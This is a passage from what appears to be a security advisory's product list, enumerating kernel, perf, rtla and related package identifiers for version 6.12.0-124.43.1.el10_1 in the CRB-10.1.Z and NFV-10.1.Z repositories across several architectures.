"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
